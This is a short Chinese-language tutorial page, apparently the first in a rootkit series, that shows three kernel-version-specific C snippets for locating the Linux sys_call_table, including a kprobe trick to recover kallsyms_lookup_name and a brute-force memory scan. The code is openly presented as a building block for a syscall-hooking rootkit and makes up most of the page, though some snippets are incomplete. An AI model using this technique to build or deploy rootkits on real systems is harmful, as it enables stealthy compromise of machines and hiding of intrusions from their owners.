[C++知识库] 0x00 Rootkit---获取sys_call

开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> C++知识库 -> 0x00 Rootkit---获取sys_call_table -> 正文阅读

[C++知识库]0x00 Rootkit---获取sys_call_table

内核版本不一致导致获取sys_call_table的方式都不一样，本章总结了三种方式获取sys_call_table。

5.7.0内核版本以上。

#include <linux/kprobes.h>
unsigned long *syscall_table;
typedef unsigned long (*kallsyms_lookup_name_t)(const char *name);
kallsyms_lookup_name_t kallsyms_lookup_name;
register_kprobe(&kp);
kallsyms_lookup_name = (kallsyms_lookup_name_t) kp.addr;
unregister_kprobe(&kp);
syscall_table = (unsigned long*)kallsyms_lookup_name("sys_call_table");
return syscall_table;

4.4.0内核版本以上，5.7.0内核版本以下。

unsigned long *syscall_table;
syscall_table = (unsigned long*)kallsyms_lookup_name("sys_call_table");
return syscall_table;

4.4.0内核版本以下。

# 直接暴力获取内存，高版本无法暴力，会直接卡死。
unsigned long *syscall_table;
unsigned long int i;
for (i = (unsigned long int)sys_close; i < ULONG_MAX;
i += sizeof(void *)) {
syscall_table = (unsigned long *)i;

if (syscall_table[__NR_close] == (unsigned long)sys_close)
return syscall_table;
}
return NULL;